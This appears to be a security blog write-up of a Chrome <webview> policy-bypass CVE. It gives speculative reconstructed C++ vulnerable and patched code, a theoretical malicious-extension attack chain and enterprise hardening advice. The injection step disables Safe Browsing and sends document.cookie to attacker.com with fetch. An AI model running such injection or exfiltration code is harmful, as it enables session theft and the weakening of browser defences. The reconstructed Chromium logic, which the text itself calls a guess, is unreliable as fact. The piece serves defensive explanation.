CVE-2026-0628: Breaking the Glass Walls of Chrome's WebView

We all love Chrome extensions. They block ads, manage passwords, and turn our cursors into tiny pizzas. But from a security architecture perspective, extensions are a nightmare. They sit in a semi-privileged position, often with read/write access to every page you visit. To mitigate this, Chromium developers built the <webview> tag—a powerful element that allows Chrome Apps and Extensions to embed 'guest' content (like a web page) within their own UI.

Ideally, the <webview> is a prison. The guest content inside it runs in a separate process, isolated from the extension's storage and, crucially, isolated from the browser's guts. You can put google.com inside a <webview>, but you should never, ever be able to put chrome://settings inside one. That would be like putting the bank vault inside the lobby.

Enter CVE-2026-0628. Gal Weizman, a researcher with a knack for tearing apart JavaScript boundaries, discovered that this prison had a loose brick. By manipulating the policy enforcement logic, a malicious extension could force the <webview> to load privileged internal URLs, shattering the isolation model and turning a simple extension into a browser-level rootkit.

The vulnerability resides deep within the GuestView mechanism. In Chromium, GuestView is the internal implementation that powers the <webview> tag. It relies on Inter-Process Communication (IPC) to coordinate between the extension (the 'embedder') and the browser process (the 'controller').

When an extension asks a <webview> to navigate to a URL, the renderer process sends an IPC message to the browser process saying, "Hey, I want to load X." The browser process is supposed to check a strictly enforced blocklist. If X starts with chrome://, the browser should laugh and kill the request. This is the Policy Enforcement step.

In CVE-2026-0628, this enforcement failed. The flaw stems from a discrepancy in how the browser validates the 'origin' or 'destination' of specific IPC messages during the initialization or redirection phase of the GuestView. It appears the check was either bypassed via a race condition or missed entirely during a specific state transition (e.g., when a webview is dynamically attached or modified via the chrome.webviewTag API).

Essentially, the browser assumed that because the request came from a valid GuestView container, it had already been sanitized. It hadn't. This 'Check-of-Time-to-Use' (TOCTOU) style flaw allowed the forbidden URL to slip past the gatekeeper.

While Google has kept the exact C++ diff under lock and key (Issue 463155954 is restricted), we can reconstruct the logic failure based on the architecture of previous GuestView escapes. The vulnerability likely existed in the GuestView::CanLoadURL or WebViewGuest::ValidateIPCCall function stack.

Here is a simplified reconstruction of the vulnerable logic in C++:

// VULNERABLE LOGIC RECONSTRUCTION
bool WebViewGuest::IsUrlAllowed(const GURL& url) {
  // Standard check: Block chrome:// schemes
  if (url.SchemeIs("chrome") || url.SchemeIs("chrome-extension")) {
      // CRITICAL FLAW: The check might return 'true' (allowed)
      // if the GuestView is in a specific 'uninitialized' state
      // or if the request comes via a specific compromised IPC channel.
      if (this->IsSpecialState() && this->IsTrustedEmbedder()) {
          return true; // <--- The smoking gun
      }
      return false;
  }
  return true;
}

The patch in Chrome 143.0.7499.192 tightens this noose. It likely removes the conditional bypass entirely or adds a mandatory ChildProcessSecurityPolicy check that cannot be skipped, regardless of the GuestView's state.

// PATCHED LOGIC
bool WebViewGuest::IsUrlAllowed(const GURL& url) {
  // Hard enforcement. No exceptions.
  if (url.SchemeIs("chrome")) {
      LOG(WARNING) << "Blocked attempt to load privileged URL in WebView";
      return false;
  }
  
  // Double-check against the global security policy
  if (!ChildProcessSecurityPolicy::GetInstance()->CanRequestURL(id, url)) {
      return false;
  }
  
  return true;
}

Since there is no public PoC, let's build a theoretical attack chain a researcher would use to demonstrate this. The goal is to execute JavaScript on chrome://settings.

Step 1: The Lure The attacker publishes a generic extension, like "Fast JSON Formatter". It asks for standard permissions. Nothing suspicious like debugger or management is needed, just enough to render a <webview>.

Step 2: The Setup The extension creates a hidden <webview> in the background page.

// background.js
const webview = document.createElement('webview');
webview.src = 'about:blank'; // Start innocent
document.body.appendChild(webview);

Step 3: The Bypass The attacker uses the vulnerability to navigate the webview to a privileged page. If the bug relies on a race condition, they might hammer the src attribute while modifying request headers.

// Triggering the policy bypass
webview.setAttribute('src', 'chrome://settings/privacy');
// If the browser process fails the check, we are now inside the settings page.

Step 4: The Injection Once the webview loads the privileged page, the extension uses executeScript (if the isolation is fully broken) or interacts with the page via content scripts that shouldn't be running there.

webview.executeScript({ code: `
  // We are now running inside chrome://settings
  // Turn off Safe Browsing
  chrome.send('setBooleanPref', ['safebrowsing.enabled', false]);
  // Steal auth cookies
  fetch('https://attacker.com/log', { body: document.cookie });
`});

The Result: The attacker has effectively bypassed the Same-Origin Policy for the browser itself. They can reconfigure the browser, install malicious certificates, or steal session tokens.

This isn't just a Cross-Site Scripting (XSS) bug on a website; it's a Universal XSS (UXSS) on the browser's operating system.

Privilege Escalation: chrome:// pages have bindings to native C++ code. They can modify preferences, read local files (via file:// if the bypass extends there), and manipulate extensions.

Data Exfiltration: By accessing internal pages, an attacker could potentially dump the chrome://settings/passwords (though usually gated by OS auth, they can still check saved username lists) or hijack the user's Google session cookies.

Persistence: An attacker could use this access to silently install other malicious extensions or relax security settings to allow drive-by downloads, effectively owning the machine indefinitely.

Google responded quickly. The fix in Chrome 143.0.7499.192 hardens the IPC validation layer. If you are a user, your browser has likely already updated itself. You can verify this by going to chrome://settings/help.

For enterprise security teams, this is a wake-up call regarding extension governance:

1. Audit Your Extensions: Use tools like crxcavator.io to assess the risk of extensions installed in your fleet.
2. Block by Default: Move to an allowlist model. Only permit extensions that have a distinct business need.
3. Monitor WebView Usage: While difficult at the network level, endpoint detection (EDR) might flag unusual child processes spawned by extensions if they are behaving erratically.